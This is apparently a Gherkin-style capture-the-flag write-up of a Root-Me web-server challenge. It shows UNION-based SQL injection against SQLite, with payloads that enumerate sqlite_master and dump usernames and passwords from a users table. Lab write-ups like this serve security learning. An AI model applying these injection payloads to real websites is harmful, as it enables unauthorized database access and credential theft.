## Version 2.0
## language: en

Feature: 18-Web Server-www.root-me.org
  Code:
    18
  Site:
    www.root-me.org
  Category:
    Web Server
  User:
    juan6630
  Goal:
    Retrieve the administrator password.

Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Windows 10      | 20H2        |
    | Mozilla Firefox | 83.0        |
  Machine information:
    Given I start the challenge with following URL
    """
    http://challenge01.root-me.org/web-serveur/ch18/
    """
    And I see some links

  Scenario: Fail:Try common injection payloads
    Given I click any of the links in the home page
    And I end up in News section with a different number at the end of the URL
    When I try adding <<../>> at the end of the URL
    Then Web application shows following warning message
    """
    Warning: SQLite3::query(): Unable to prepare statement: 1, near "." ...
    """
    And I know that Web application uses SQLite and the query is in the URL

  Scenario: Fail:Try to use simple batched queries
    Given Web application uses SQLite
    When I try adding queries using <<;>>
    Then It didn't work
    When I try using <<UNION>> with the following payload
    """
    ...id=3 union select 1 from master
    """
    Then Web application returns the following warning message
    """
    no such table: master
    """
    And I know <<UNION>> works and I need the table's name

  Scenario: Success:Finding database schema and using batched queries
    Given I know web application uses SQLite
    When I research for 'schema of SQLite3'
    And I find out the options <<sqlite_schema>> <<sqlite_master>>
    When I use <<sqlite_master>>
    Then I get a different error
    """
    SELECTs to the left and right of UNION do not have the same size
    """
    When I check documentation for the table <<sqlite_master>> again
    And I use this payload
    """
    ...news_id=1 union select tbl_name, sql, name from sqlite_master
    """
    Then I get the name of the table with user:password [evidence](tables.png)
    When I look at the data in the users table using
    """
    ...news_id=1 union select 1, username, password from users
    """
    Then I get the admin password [evidence](passwd.png)
    And I solve the challenge
